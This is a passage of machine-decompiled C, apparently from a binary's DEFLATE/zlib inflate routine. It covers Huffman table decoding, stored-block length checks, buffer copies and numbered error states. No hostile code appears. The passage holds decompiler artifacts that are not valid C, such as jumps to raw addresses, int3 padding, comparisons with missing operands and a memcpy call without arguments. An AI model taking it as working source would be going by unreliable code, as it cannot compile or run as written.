																						 *((intOrPtr*)(_t1066 + _t799 * 4 - 0xd0)) =  *((intOrPtr*)(_t1066 + _t799 * 4 - 0xd0)) + 1;
																						__eflags = _t899 -  *_t1012;
																					} while (_t899 <  *_t1012);
																				}
																				L145:
																				goto 0x3113d7;
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				L146:
																				 *(_t1066 - 0x8c) = _t899;
																				 *(_t1066 - 0x90) = _t899;
																				 *(_t1066 - 0x2c) = _t899;
																				 *(_t1066 - 0x30) = _t899;
																				do {
																					L147:
																					_t736 =  *((intOrPtr*)(_t1066 + _t1012 - 0xd4));
																					_t901 = _t899 + _t736 + _t899 + _t736;
																					_t1029 = _t1029 + _t736;
																					_t737 =  *((intOrPtr*)(_t1066 + _t1012 - 0xd0));
																					 *(_t1066 - 0x30) =  *(_t1066 - 0x30) + _t737;
																					 *((intOrPtr*)(_t1066 + _t1012 - 0x90)) = _t901;
																					_t738 =  *((intOrPtr*)(_t1066 + _t1012 - 0xcc));
																					_t903 = _t901 + _t737 + _t901 + _t737;
																					 *(_t1066 - 0x2c) =  *(_t1066 - 0x2c) + _t738;
																					 *((intOrPtr*)(_t1066 + _t1012 - 0x8c)) = _t903;
																					_t899 = _t903 + _t738 + _t903 + _t738;
																					 *(_t1066 + _t1012 - 0x88) = _t899;
																					_t1012 = _t1012 + 0xc;
																					__eflags = _t1012 - 0x40;
																				} while (_t1012 <= 0x40);
																				 *(_t1066 - 0x4c) = _t899;
																				 *(_t1066 - 0x24) = _t1029;
																				_t1029 =  *(_t1066 - 0x14);
																				_t906 =  *(_t1066 - 0x24) +  *(_t1066 - 0x2c) +  *(_t1066 - 0x30);
																				__eflags =  *(_t1066 - 0x4c) - 0x10000;
																				if( *(_t1066 - 0x4c) == 0x10000) {
																					L150:
																					_t741 =  *(_t1066 - 0x44);
																					 *(_t1066 - 0x30) = 0xffffffff;
																					 *(_t1066 - 0x4c) = 0;
																					__eflags =  *_t741;
																					if( *_t741 > 0) {
																						L151:
																						_t1065 =  *(_t1066 - 0x4c);
																						do {
																							L152:
																							L153:
																							_t918 =  *(_t1065 + _t741) & 0x000000ff;
																							 *(_t1066 - 0x44) = _t918;
																							__eflags = _t918;
																							if(_t918 != 0) {
																								L154:
																								_t778 =  *(_t1066 + _t918 * 4 - 0x90);
																								 *(_t1066 - 0x2c) = _t778;
																								 *(_t1066 + _t918 * 4 - 0x90) = _t778 + 1;
																								 *(_t1066 - 0x24) = _t918;
																								__eflags = _t918;
																								if(_t918 != 0) {
																									L155:
																									do {
																										L156:
																										 *(_t1066 - 0x2c) =  *(_t1066 - 0x2c) >> 1;
																										_t798 =  *(_t1066 - 0x24) - 1;
																										_t1012 = _t1012 + _t1012 |  *(_t1066 - 0x2c) & 0x00000001;
																										 *(_t1066 - 0x24) = _t798;
																										__eflags = _t798;
																									} while (_t798 != 0);
																									_t918 =  *(_t1066 - 0x44);
																								}
																								L158:
																								__eflags = _t918 - 0xa;
																								if(_t918 > 0xa) {
																									L164:
																									_t782 =  *(_t1066 - 0xc) + 0x120 + (_t1012 & 0x000003ff) * 2;
																									_t846 =  *(_t1066 - 0x30);
																									 *(_t1066 - 0x44) = _t782;
																									_t783 =  *_t782;
																									 *(_t1066 - 0x2c) = _t783;
																									__eflags = _t783;
																									if(_t783 == 0) {
																										 *( *(_t1066 - 0x44)) = _t846;
																										_t783 = _t846;
																										_t846 = _t846 - 2;
																										__eflags = _t846;
																										 *(_t1066 - 0x2c) = _t783;
																										 *(_t1066 - 0x30) = _t846;
																									}
																									L166:
																									_t1020 = _t1012 >> 9;
																									__eflags = _t918 - 0xb;
																									if(_t918 > 0xb) {
																										L167:
																										_t919 = _t918 + 0xfffffff5;
																										__eflags = _t919;
																										 *(_t1066 - 0x24) = _t919;
																										_t920 =  *(_t1066 - 0x2c);
																										do {
																											L168:
																											_t1020 = _t1020 >> 1;
																											_t788 = 0x48f - _t920 - (_t1020 & 0x00000001);
																											_t923 =  *( *(_t1066 - 0xc) + 0x91e) & 0x0000ffff;
																											__eflags = _t923;
																											if(_t923 != 0) {
																												_t920 = _t923;
																											} else {
																												 *( *(_t1066 - 0xc) + _t788 * 2) = _t846;
																												_t789 =  *(_t1066 - 0x30);
																												_t920 = _t789;
																												_t790 = _t789 - 2;
																												 *(_t1066 - 0x30) = _t790;
																												_t846 = _t790;
																											}
																											L171:
																											_t361 = _t1066 - 0x24;
																											 *_t361 =  *(_t1066 - 0x24) - 1;
																											__eflags =  *_t361;
																										} while ( *_t361 != 0);
																										 *(_t1066 - 0x2c) = _t920;
																										_t783 = _t920;
																									}
																									L173:
																									_t1012 = (_t1020 >> 0x00000001 & 0x00000001) - _t783;
																									__eflags = _t1012;
																									 *( *(_t1066 - 0xc) + 0x91e + _t1012 * 2) = _t1065;
																								} else {
																									L159:
																									_t795 = (_t918 << 0x00000009 | _t1065) & 0x0000ffff;
																									 *(_t1066 - 0x44) = _t795;
																									__eflags = _t1012 - 0x400;
																									if(_t1012 < 0x400) {
																										L160:
																										goto 0x311401;
																										asm("int3");
																										asm("int3");
																										asm("int3");
																										L161:
																										_t796 = _t795 << _t918;
																										 *(_t1066 - 0x4c) = _t796 + _t796;
																										_t928 =  *(_t1066 - 0xc) + _t1012 * 2 + 0x120;
																										__eflags = _t928;
																										do {
																											L162:
																											 *_t928 = _t1029;
																											_t1012 = _t1012 + _t796;
																											_t928 = _t928 +  *(_t1066 - 0x4c);
																											__eflags = _t1012 - 0x400;
																										} while (_t1012 < 0x400);
																										_t1029 =  *(_t1066 - 0x14);
																									}
																								}
																							}
																							L174:
																							_t741 =  *(_t1029 + 0x18);
																							_t1065 = _t1065 + 1;
																							__eflags = _t1065 -  *((intOrPtr*)(_t1029 + 0x2c + _t741 * 4));
																						} while (_t1065 <  *((intOrPtr*)(_t1029 + 0x2c + _t741 * 4)));
																						goto 0x311417;
																						asm("int3");
																					}
																					L176:
																					__eflags =  *(_t1029 + 0x18) - 2;
																					if( *(_t1029 + 0x18) != 2) {
																						L217:
																						 *(_t1029 + 0x18) =  *(_t1029 + 0x18) - 1;
																						continue;
																					} else {
																						L177:
																						_t907 = 0;
																						__eflags = 0;
																						while(1) {
																							L178:
																							_t1013 =  *(_t1066 - 4);
																							while(1) {
																								L179:
																								 *(_t1066 - 8) = _t907;
																								__eflags = _t907 -  *(_t1029 + 0x30) +  *(_t1029 + 0x2c);
																								if(_t907 >=  *(_t1029 + 0x30) +  *(_t1029 + 0x2c)) {
																									break;
																								}
																								L180:
																								__eflags = _t1065 - 0xf;
																								if(_t1065 >= 0xf) {
																									L197:
																									_t756 =  *((short*)(_t1029 + 0x1ca0 + (_t1013 & 0x000003ff) * 2));
																									 *(_t1066 - 0x28) = _t756;
																									__eflags = _t756;
																									if(_t756 < 0) {
																										L199:
																										L200:
																										do {
																											L201:
																											 *(_t1066 - 0x28) =  !( *(_t1066 - 0x28));
																											_t758 = _t1013 >> _t907;
																											_t907 = _t907 + 1;
																											_t595 =  *((short*)(_t1029 + 0x24a0 + ((_t758 & 0x00000001) +  *(_t1066 - 0x28)) * 2));
																											 *(_t1066 - 0x28) = _t595;
																											__eflags = _t595;
																										} while (_t595 < 0);
																									} else {
																										L198:
																										_t907 = _t756 >> 9;
																										_t595 = _t756 & 0x000001ff;
																										 *(_t1066 - 0x28) = _t595;
																									}
																									L202:
																									_t1013 = _t1013 >> _t907;
																									_t1050 = _t1065 - _t907;
																									 *(_t1066 - 4) = _t1013;
																									 *(_t1066 - 0x1c) = _t1050;
																									__eflags = _t595 - 0x10;
																									if(__eflags >= 0) {
																										L204:
																										if(__eflags != 0) {
																											L207:
																											_t908 =  *((char*)(_t595 + 0x120ff0));
																											 *(_t1066 - 0x38) = _t908;
																											__eflags = _t1050 - _t908;
																											if(_t1050 >= _t908) {
																												L211:
																												_t1050 = _t1050 - _t908;
																												 *(_t1066 - 0x1c) = _t1050;
																												_t909 =  *(_t1066 - 0x14);
																												_t1039 = ((0x00000001 << _t908) - 0x00000001 & _t1013) +  *((char*)(_t595 + 0x120ff8));
																												__eflags =  *(_t1066 - 0x28) - 0x10;
																												_t762 =  *(_t1066 - 8);
																												 *(_t1066 - 4) = _t1013 >> _t908;
																												if( *(_t1066 - 0x28) != 0x10) {
																													_t1016 = 0;
																													__eflags = 0;
																												} else {
																													_t1016 =  *(_t762 + _t909 + 0x2923) & 0x000000ff;
																												}
																												L214:
																												memset(_t762 + _t909 + 0x2924, _t1016, _t1039);
																												_t1068 = _t1068 + 0xc;
																												_t907 =  *(_t1066 - 8) + _t1039;
																												_t1029 =  *(_t1066 - 0x14);
																												L178:
																												_t1013 =  *(_t1066 - 4);
																												continue;
																											} else {
																												while(1) {
																													L208:
																													__eflags = _t846 -  *(_t1066 - 0x20);
																													if(_t846 >=  *(_t1066 - 0x20)) {
																														break;
																													}
																													L209:
																													_t595 = ( *_t846 & 0x000000ff) << _t1050;
																													_t846 = _t846 + 1;
																													_t908 =  *(_t1066 - 0x38);
																													_t1013 = _t1013 | _t595;
																													_t1050 = _t1050 + 8;
																													 *(_t1066 - 0x18) = _t846;
																													 *(_t1066 - 4) = _t1013;
																													__eflags = _t1050 - _t908;
																													if(_t1050 < _t908) {
																														continue;
																													} else {
																														L210:
																														_t595 =  *(_t1066 - 0x28);
																														goto L211;
																													}
																													goto L295;
																												}
																												L251:
																												 *_t1029 = 0x12;
																												goto L285;
																											}
																										} else {
																											L205:
																											_t766 =  *(_t1066 - 8);
																											__eflags = _t766;
																											if(_t766 == 0) {
																												L268:
																												_t684 = _t766 | 0xffffffff;
																												 *_t1029 = 0x11;
																												goto L291;
																											} else {
																												L206:
																												_t595 =  *(_t1066 - 0x28);
																												goto L207;
																											}
																										}
																									} else {
																										L203:
																										_t913 =  *(_t1066 - 8);
																										 *(_t1029 + 0x2924 + _t913) = _t595;
																										_t907 = _t913 + 1;
																										continue;
																									}
																								} else {
																									L181:
																									__eflags =  *(_t1066 - 0x20) - _t846 - 2;
																									if( *(_t1066 - 0x20) - _t846 >= 2) {
																										L195:
																										_t1017 =  *(_t846 + 1) & 0x000000ff;
																										_t769 =  *_t846 & 0x000000ff;
																										_t846 = _t846 + 2;
																										_t907 = _t1065;
																										 *(_t1066 - 0x18) = _t846;
																										 *(_t1066 - 4) =  *(_t1066 - 4) | _t1017 << _t1065 + 0x00000008 | _t769 << _t907;
																										_t1065 = _t1065 + 0x10;
																										__eflags = _t1065;
																										_t1013 =  *(_t1066 - 4);
																										goto L196;
																									} else {
																										do {
																											L182:
																											_t595 = _t1013 & 0x000003ff;
																											_t1040 =  *((short*)(_t1029 + 0x1ca0 + _t595 * 2));
																											__eflags = _t1040;
																											if(_t1040 < 0) {
																												L186:
																												__eflags = _t1065 - 0xa;
																												if(_t1065 <= 0xa) {
																													goto L191;
																												} else {
																													L187:
																													L188:
																													 *(_t1066 - 0x24) = _t907;
																													while(1) {
																														L189:
																														_t1040 =  *((short*)( *(_t1066 - 0x14) + 0x24a0 + ((_t1013 >> _t907 & 0x00000001) +  !_t1040) * 2));
																														_t907 =  *(_t1066 - 0x24) + 1;
																														 *(_t1066 - 0x24) = _t907;
																														__eflags = _t1040;
																														if(_t1040 >= 0) {
																															goto L196;
																														}
																														L190:
																														_t595 = _t907 + 1;
																														__eflags = _t1065 - _t595;
																														if(_t1065 >= _t595) {
																															continue;
																														} else {
																															goto L191;
																														}
																														goto L295;
																													}
																													goto L196;
																												}
																											} else {
																												L183:
																												_t1042 = _t1040 >> 9;
																												__eflags = _t1042;
																												if(_t1042 == 0) {
																													L191:
																													_t1029 =  *(_t1066 - 0x14);
																													L192:
																													__eflags = _t846 -  *(_t1066 - 0x20);
																													if(_t846 >=  *(_t1066 - 0x20)) {
																														L250:
																														 *_t1029 = 0x10;
																														goto L285;
																													} else {
																														goto L193;
																													}
																												} else {
																													L184:
																													__eflags = _t1065 - _t1042;
																													if(_t1065 >= _t1042) {
																														L196:
																														_t1029 =  *(_t1066 - 0x14);
																														goto L197;
																													} else {
																														L185:
																														goto L191;
																													}
																												}
																											}
																											goto L295;
																											L193:
																											_t907 = _t1065;
																											_t773 = ( *_t846 & 0x000000ff) << _t907;
																											_t846 = _t846 + 1;
																											_t1013 = _t1013 | _t773;
																											 *(_t1066 - 0x18) = _t846;
																											_t1065 = _t1065 + 8;
																											 *(_t1066 - 4) = _t1013;
																											__eflags = _t1065 - 0xf;
																										} while (_t1065 < 0xf);
																										goto L197;
																									}
																								}
																								goto L295;
																							}
																							L215:
																							_t1014 =  *(_t1029 + 0x2c);
																							_t745 =  *(_t1029 + 0x30) + _t1014;
																							__eflags = _t745 - _t907;
																							if(_t745 != _t907) {
																								L269:
																								_t684 = _t745 | 0xffffffff;
																								 *_t1029 = 0x15;
																								goto L291;
																							} else {
																								L216:
																								memcpy(_t1029 + 0x40, _t1029 + 0x2924, _t1014);
																								_t751 =  *(_t1029 + 0x2c) + 0x2924 + _t1029;
																								__eflags = _t751;
																								memcpy(_t1029 + 0xde0, _t751,  *(_t1029 + 0x30));
																								_t1068 = _t1068 + 0x18;
																								goto L217;
																							}
																							goto L295;
																						}
																					}
																				} else {
																					L149:
																					__eflags = _t906 - 1;
																					if(_t906 > 1) {
																						L267:
																						 *(_t1066 - 0xc) = 0xffffffff;
																						 *_t1029 = 0x23;
																						goto L292;
																					} else {
																						goto L150;
																					}
																				}
																				goto L295;
																			}
																			L218:
																			_t988 =  *(_t1066 - 4);
																			while(1) {
																				L38:
																				_t883 =  *(_t1066 - 0x20) - _t846;
																				__eflags = _t883 - 4;
																				if(_t883 < 4) {
																					goto L57;
																				}
																				goto L39;
																			}
																			goto L57;
																		}
																	}
																} else {
																	L89:
																	_t595 = _t1050 & 0x00000007;
																	__eflags = _t1050 - _t595;
																	if(_t1050 >= _t595) {
																		L92:
																		_t940 = _t1050 & 0x00000007;
																		_t987 = _t997 >> _t940;
																		_t1050 = _t1050 - _t940;
																		 *(_t1066 - 4) = _t987;
																		_t941 = 0;
																		__eflags = 0;
																		while(1) {
																			L93:
																			 *(_t1066 - 8) = _t941;
																			__eflags = _t941 - 4;
																			if(_t941 >= 4) {
																				break;
																			}
																			L94:
																			__eflags = _t1050;
																			if(_t1050 == 0) {
																				L100:
																				__eflags = _t846 -  *(_t1066 - 0x20);
																				if(_t846 >=  *(_t1066 - 0x20)) {
																					L244:
																					 *_t1029 = 7;
																					goto L285;
																				} else {
																					L101:
																					_t595 =  *_t846;
																					_t846 = _t846 + 1;
																					(_t1029 + 0x2920)[_t941] = _t595;
																					_t941 = _t941 + 1;
																					 *(_t1066 - 0x18) = _t846;
																					continue;
																				}
																			} else {
																				L95:
																				__eflags = _t1050 - 8;
																				if(_t1050 >= 8) {
																					L99:
																					(_t1029 + 0x2920)[_t941] = _t987;
																					_t1050 = _t1050 - 8;
																					_t987 = _t987 >> 8;
																					_t941 = _t941 + 1;
																					 *(_t1066 - 4) = _t987;
																					continue;
																				} else {
																					while(1) {
																						L96:
																						__eflags = _t846 -  *(_t1066 - 0x20);
																						if(_t846 >=  *(_t1066 - 0x20)) {
																							break;
																						}
																						L97:
																						_t595 = ( *_t846 & 0x000000ff) << _t1050;
																						_t846 = _t846 + 1;
																						_t987 = _t987 | _t595;
																						 *(_t1066 - 0x18) = _t846;
																						_t1050 = _t1050 + 8;
																						 *(_t1066 - 4) = _t987;
																						__eflags = _t1050 - 8;
																						if(_t1050 < 8) {
																							continue;
																						} else {
																							L98:
																							_t941 =  *(_t1066 - 8);
																							goto L99;
																						}
																						goto L295;
																					}
																					L243:
																					 *_t1029 = 6;
																					goto L285;
																				}
																			}
																			goto L295;
																		}
																		L102:
																		_t595 =  *(_t1029 + 0x2922) & 0x000000ff;
																		 *(_t1066 - 8) = ( *(_t1029 + 0x2921) & 0x000000ff) << 0x00000008 |  *(_t1029 + 0x2920) & 0x000000ff;
																		__eflags =  *(_t1066 - 8) - ((( *(_t1029 + 0x2923) & 0x000000ff) << 0x00000008 | _t595) ^ 0x0000ffff);
																		if( *(_t1066 - 8) != ((( *(_t1029 + 0x2923) & 0x000000ff) << 0x00000008 | _t595) ^ 0x0000ffff)) {
																			L265:
																			 *(_t1066 - 0xc) = 0xffffffff;
																			 *_t1029 = 0x27;
																			goto L292;
																		} else {
																			L103:
																			_t949 =  *(_t1066 - 8);
																			while(1) {
																				L104:
																				__eflags = _t949;
																				if(_t949 == 0) {
																					goto L84;
																				}
																				L105:
																				__eflags = _t1050;
																				if(_t1050 == 0) {
																					L112:
																					_t595 =  *(_t1066 - 0x10);
																					while(1) {
																						L113:
																						__eflags = _t949;
																						if(_t949 == 0) {
																							break;
																						}
																						L115:
																						_t1025 =  *((intOrPtr*)(_t1066 - 0x40));
																						__eflags = _t595 - _t1025;
																						if(_t595 < _t1025) {
																							L117:
																							_t595 =  *(_t1066 - 0x20);
																							__eflags = _t846 - _t595;
																							if(_t846 >= _t595) {
																								L247:
																								_t1029 =  *(_t1066 - 0x14);
																								 *_t1029 = 0x26;
																								goto L285;
																							} else {
																								L118:
																								_t987 = _t1025 -  *(_t1066 - 0x10);
																								_t1047 = _t595 - _t846;
																								__eflags = _t987 - _t1047;
																								_t817 =  <  ? _t987 : _t1047;
																								__eflags = ( <  ? _t987 : _t1047) - _t949;
																								if(( <  ? _t987 : _t1047) >= _t949) {
																									_t1029 = _t949;
																								} else {
																									__eflags = _t987 - _t1047;
																									_t1029 =  <  ? _t987 : _t1047;
																								}
																								L121:
																								L122:
																								memcpy();
																								_t846 = _t846 + _t1029;
																								_t595 =  *(_t1066 - 0x10) + _t1029;
																								_t1068 = _t1068 + 0xc;
																								 *(_t1066 - 0x18) = _t846;
																								_t949 =  *(_t1066 - 8) - _t1029;
																								 *(_t1066 - 0x10) = _t595;
																								 *(_t1066 - 8) = _t949;
																								continue;
																							}
																						} else {
																							L116:
																							_t1029 =  *(_t1066 - 0x14);
																							 *(_t1066 - 0xc) = 2;
																							 *_t1029 = 9;
																							goto L292;
																						}
																						goto L295;
																					}
																					L114:
																					goto 0x311388;
																					asm("int3");
																					goto L84;
																				} else {
																					L106:
																					__eflags = _t1050 - 8;
																					if(_t1050 >= 8) {
																						L109:
																						_t595 = _t987 & 0x000000ff;
																						_t987 = _t987 >> 8;
																						_t1050 = _t1050 - 8;
																						 *(_t1066 - 0x28) = _t595;
																						 *(_t1066 - 4) = _t987;
																						L110:
																						__eflags =  *(_t1066 - 0x10) -  *((intOrPtr*)(_t1066 - 0x40));
																						_t1029 =  *(_t1066 - 0x14);
																						if( *(_t1066 - 0x10) >=  *((intOrPtr*)(_t1066 - 0x40))) {
																							L246:
																							 *(_t1066 - 0xc) = 2;
																							 *_t1029 = 0x34;
																							goto L292;
																						} else {
																							L111:
																							 *(_t1066 - 0x10) =  *(_t1066 - 0x10) + 1;
																							 *( *(_t1066 - 0x10)) = _t595;
																							_t949 =  *(_t1066 - 8) - 1;
																							 *(_t1066 - 8) = _t949;
																							continue;
																						}
																					} else {
																						while(1) {
																							L107:
																							__eflags = _t846 -  *(_t1066 - 0x20);
																							if(_t846 >=  *(_t1066 - 0x20)) {
																								break;
																							}
																							L108:
																							_t595 = ( *_t846 & 0x000000ff) << _t1050;
																							_t846 = _t846 + 1;
																							_t987 = _t987 | _t595;
																							 *(_t1066 - 0x18) = _t846;
																							_t1050 = _t1050 + 8;
																							 *(_t1066 - 4) = _t987;
																							__eflags = _t1050 - 8;
																							if(_t1050 < 8) {
																								continue;
																							} else {
																								goto L109;
																							}
																							goto L295;
																						}
																						L245:
																						 *_t1029 = 0x33;
																						goto L285;
																					}
																				}
																				goto L295;
																			}
																			continue;
																		}
																	} else {
																		while(1) {
																			L90:
																			__eflags = _t846 -  *(_t1066 - 0x20);
																			if(_t846 >=  *(_t1066 - 0x20)) {
																				break;
																			}
																			L91:
																			_t823 = ( *_t846 & 0x000000ff) << _t1050;
																			_t1050 = _t1050 + 8;
																			_t997 = _t997 | _t823;
																			_t846 = _t846 + 1;
																			 *(_t1066 - 0x18) = _t846;
																			_t595 = _t1050 & 0x00000007;
																			 *(_t1066 - 4) = _t997;
																			__eflags = _t1050 - _t595;
																			if(_t1050 < _t595) {
																				continue;
																			} else {
																				goto L92;
																			}
																			goto L295;
																		}
																		L242:
																		 *_t1029 = 5;
																		goto L285;
																	}
																}
															} else {
																while(1) {
																	L86:
																	__eflags = _t846 -  *(_t1066 - 0x20);
																	if(_t846 >=  *(_t1066 - 0x20)) {
																		break;
																	}
																	L87:
																	_t595 = ( *_t846 & 0x000000ff) << _t1064;
																	_t846 = _t846 + 1;
																	_t987 = _t987 | _t595;
																	 *(_t1066 - 0x18) = _t846;
																	_t1050 = _t1064 + 8;
																	 *(_t1066 - 4) = _t987;
																	__eflags = _t1050 - 3;
																	if(_t1050 < 3) {
																		continue;
																	} else {
																		goto L88;
																	}
																	goto L295;
																}
																L241:
																 *_t1029 = 3;
																goto L285;
															}
															goto L295;
														}
														L252:
														_t595 = _t1064 & 0x00000007;
														__eflags = _t1064 - _t595;
														if(_t1064 >= _t595) {
															L256:
															_t683 =  *(_t1066 - 0x3c);
															_t890 = _t1064 & 0x00000007;
															_t992 = _t987 >> _t890;
															_t1050 = _t1064 - _t890;
															 *(_t1066 - 4) = _t992;
															__eflags = _t846 - _t683;
															if(_t846 > _t683) {
																while(1) {
																	L257:
																	__eflags = _t1050 - 8;
																	if(_t1050 < 8) {
																		goto L259;
																	}
																	L258:
																	_t846 = _t846 - 1;
																	_t1050 = _t1050 - 8;
																	__eflags = _t846 - _t683;
																	if(_t846 > _t683) {
																		continue;
																	}
																	goto L259;
																}
															}
															L259:
															L260:
															_t595 = _t1050;
															asm("bts edx, eax");
															__eflags = _t595 - 0x20;
															_t892 =  >=  ? _t992 : 0;
															_t993 = _t992 ^ _t892;
															__eflags = _t595 - 0x40;
															_t893 =  >=  ? _t993 : _t892;
															 *(_t1066 - 4) =  *(_t1066 - 4) & _t993 - 0x00000001;
															__eflags =  *(_t1066 + 0x18) & 0x00000001;
															if(( *(_t1066 + 0x18) & 0x00000001) == 0) {
																L290:
																_t684 = 0;
																__eflags = 0;
																 *_t1029 = 0x22;
																goto L291;
															} else {
																L261:
																_t894 = 0;
																while(1) {
																	L277:
																	 *(_t1066 - 8) = _t894;
																	__eflags = _t894 - 4;
																	if(_t894 >= 4) {
																		goto L290;
																	}
																	L278:
																	__eflags = _t1050;
																	if(_t1050 != 0) {
																		L281:
																		_t995 =  *(_t1066 - 4);
																		__eflags = _t1050 - 8;
																		if(_t1050 >= 8) {
																			L275:
																			_t685 = _t995 & 0x000000ff;
																			_t1050 = _t1050 - 8;
																			__eflags = _t1050;
																			 *(_t1066 - 4) = _t995 >> 8;
																			goto L276;
																		} else {
																			L282:
																			while(1) {
																				L272:
																				__eflags = _t846 -  *(_t1066 - 0x20);
																				if(_t846 >=  *(_t1066 - 0x20)) {
																					break;
																				}
																				L273:
																				_t595 = ( *_t846 & 0x000000ff) << _t1050;
																				_t1050 = _t1050 + 8;
																				_t995 = _t995 | _t595;
																				_t846 = _t846 + 1;
																				 *(_t1066 - 4) = _t995;
																				__eflags = _t1050 - 8;
																				if(_t1050 < 8) {
																					continue;
																				} else {
																					L274:
																					_t894 =  *(_t1066 - 8);
																					goto L275;
																				}
																				goto L295;
																			}
																			L284:
																			 *_t1029 = 0x29;
																			goto L285;
																		}
																	} else {
																		L279:
																		__eflags = _t846 -  *(_t1066 - 0x20);
																		if(_t846 >=  *(_t1066 - 0x20)) {
																			L283:
																			 *_t1029 = 0x2a;
																			goto L285;
																		} else {
																			L280:
																			_t685 =  *_t846 & 0x000000ff;
																			_t846 = _t846 + 1;
																			L276:
																			 *(_t1066 - 0x24) = _t685;
																			_t595 =  *(_t1029 + 0x10) << 0x00000008 |  *(_t1066 - 0x24);
																			_t894 = _t894 + 1;
																			__eflags = _t894;
																			 *(_t1029 + 0x10) = _t595;
																			continue;
																		}
																	}
																	goto L295;
																}
																goto L290;
															}
														} else {
															L253:
															while(1) {
																L254:
																__eflags = _t846 -  *(_t1066 - 0x20);
																if(_t846 >=  *(_t1066 - 0x20)) {
																	break;
																}
																L255:
																_t1050 = _t1064 + 8;
																_t987 = _t987 | ( *_t846 & 0x000000ff) << _t1064;
																_t846 = _t846 + 1;
																 *(_t1066 - 4) = _t987;
																_t595 = _t1050 & 0x00000007;
																__eflags = _t1050 - _t595;
																if(_t1050 < _t595) {
																	continue;
																} else {
																	goto L256;
																}
																goto L295;
															}
															L271:
															 *_t1029 = 0x20;
															goto L285;
														}
													}
												} else {
													L48:
													__eflags = _t1064 - 0xf;
													if(_t1064 < 0xf) {
														_t1006 =  *(_t846 + 1) & 0x000000ff;
														_t884 = _t1064;
														_t723 =  *_t846 & 0x000000ff;
														_t846 = _t846 + 2;
														_t1029 =  *(_t1066 - 0x14);
														 *(_t1066 - 0x18) = _t846;
														 *(_t1066 - 4) =  *(_t1066 - 4) | (_t1006 << 0x00000008 | _t723) << _t884;
														_t1064 = _t1064 + 0x10;
														__eflags = _t1064;
														_t987 =  *(_t1066 - 4);
													}
													_t716 =  *((short*)(_t1029 + 0x160 + (_t987 & 0x000003ff) * 2));
													 *(_t1066 - 0x1c) = _t716;
													__eflags = _t716;
													if(_t716 < 0) {
														L52:
														goto 0x311349;
														asm("int3");
														asm("int3");
														asm("int3");
														do {
															L53:
															_t718 = _t987 >> _t884;
															_t884 = _t884 + 1;
															_t846 =  *((short*)(_t1029 + 0x960 + ((_t718 & 0x00000001) +  !_t846) * 2));
															__eflags = _t846;
														} while (_t846 < 0);
														 *(_t1066 - 0x1c) = _t846;
														_t846 =  *(_t1066 - 0x18);
													} else {
														L51:
														_t884 = _t716 >> 9;
													}
													L55:
													_t595 =  *(_t1066 - 8);
													_t1064 = _t1064 - _t884;
													_t987 = _t987 >> _t884;
													 *(_t1066 - 4) = _t987;
													 *( *(_t1066 - 0x10)) = _t595;
													_t884 =  *(_t1066 - 0x1c);
													__eflags = _t884 & 0x00000100;
													if((_t884 & 0x00000100) != 0) {
														L82:
														_t168 = _t1066 - 0x10;
														 *_t168 =  *(_t1066 - 0x10) + 1;
														__eflags =  *_t168;
														goto L83;
													} else {
														L56:
														_t721 =  *(_t1066 - 0x10);
														 *(_t721 + 1) = _t884;
														 *(_t1066 - 0x10) = _t721 + 2;
														while(1) {
															L38:
															_t883 =  *(_t1066 - 0x20) - _t846;
															__eflags = _t883 - 4;
															if(_t883 < 4) {
																goto L57;
															}
															goto L39;
														}
													}
												}
											}
											goto L295;
											L57:
											__eflags = _t1050 - 0xf;
											if(_t1050 >= 0xf) {
												L74:
												_t669 =  *((short*)(_t1029 + 0x160 + (_t988 & 0x000003ff) * 2));
												 *(_t1066 - 8) = _t669;
												__eflags = _t669;
												if(_t669 < 0) {
													L76:
													goto 0x311372;
													asm("int3");
													asm("int3");
													asm("int3");
													do {
														L77:
														_t671 = _t988 >> _t883;
														_t883 = _t883 + 1;
														_t595 = (_t671 & 0x00000001) +  !_t846;
														_t846 =  *((short*)(_t1029 + 0x960 + _t595 * 2));
														__eflags = _t846;
													} while (_t846 < 0);
													 *(_t1066 - 8) = _t846;
													_t846 =  *(_t1066 - 0x18);
												} else {
													L75:
													_t883 = _t669 >> 9;
													_t595 = _t669 & 0x000001ff;
													 *(_t1066 - 8) = _t595;
												}
												L79:
												_t987 = _t988 >> _t883;
												_t1064 = _t1050 - _t883;
												_t884 =  *(_t1066 - 8);
												 *(_t1066 - 4) = _t987;
												__eflags = _t884 - 0x100;
												if(_t884 >= 0x100) {
													goto L83;
												} else {
													L80:
													_t825 =  *(_t1066 - 0x10);
													__eflags = _t825 -  *((intOrPtr*)(_t1066 - 0x40));
													if(_t825 >=  *((intOrPtr*)(_t1066 - 0x40))) {
														L240:
														 *(_t1066 - 0xc) = 2;
														 *_t1029 = 0x18;
														goto L292;
													} else {
														L81:
														 *_t825 = _t884;
														 *(_t1066 - 0x10) = _t825 + 1;
														continue;
													}
												}
											} else {
												L58:
												__eflags = _t883 - 2;
												if(_t883 >= 2) {
													L72:
													_t999 =  *(_t846 + 1) & 0x000000ff;
													_t697 =  *_t846 & 0x000000ff;
													_t846 = _t846 + 2;
													_t883 = _t1050;
													 *(_t1066 - 0x18) = _t846;
													 *(_t1066 - 4) =  *(_t1066 - 4) | _t999 << _t1050 + 0x00000008 | _t697 << _t883;
													_t1050 = _t1050 + 0x10;
													__eflags = _t1050;
													_t988 =  *(_t1066 - 4);
													goto L73;
												} else {
													do {
														L59:
														_t595 = _t988 & 0x000003ff;
														_t1032 =  *((short*)(_t1029 + 0x160 + _t595 * 2));
														__eflags = _t1032;
														if(_t1032 < 0) {
															L63:
															__eflags = _t1050 - 0xa;
															if(_t1050 <= 0xa) {
																goto L68;
															} else {
																L64:
																 *(_t1066 - 0x1c) = _t883;
																while(1) {
																	L66:
																	_t1032 =  *((short*)( *(_t1066 - 0x14) + 0x960 + ((_t988 >> _t883 & 0x00000001) +  !_t1032) * 2));
																	_t883 =  *(_t1066 - 0x1c) + 1;
																	 *(_t1066 - 0x1c) = _t883;
																	__eflags = _t1032;
																	if(_t1032 >= 0) {
																		goto L73;
																	}
																	L67:
																	_t595 = _t883 + 1;
																	__eflags = _t1050 - _t595;
																	if(_t1050 >= _t595) {
																		continue;
																	} else {
																		goto L68;
																	}
																	goto L295;
																}
																goto L73;
															}
														} else {
															L60:
															_t1034 = _t1032 >> 9;
															__eflags = _t1034;
															if(_t1034 == 0) {
																L68:
																_t1029 =  *(_t1066 - 0x14);
																L69:
																__eflags = _t846 -  *(_t1066 - 0x20);
																if(_t846 >=  *(_t1066 - 0x20)) {
																	L239:
																	 *_t1029 = 0x17;
																	goto L285;
																} else {
																	goto L70;
																}
															} else {
																L61:
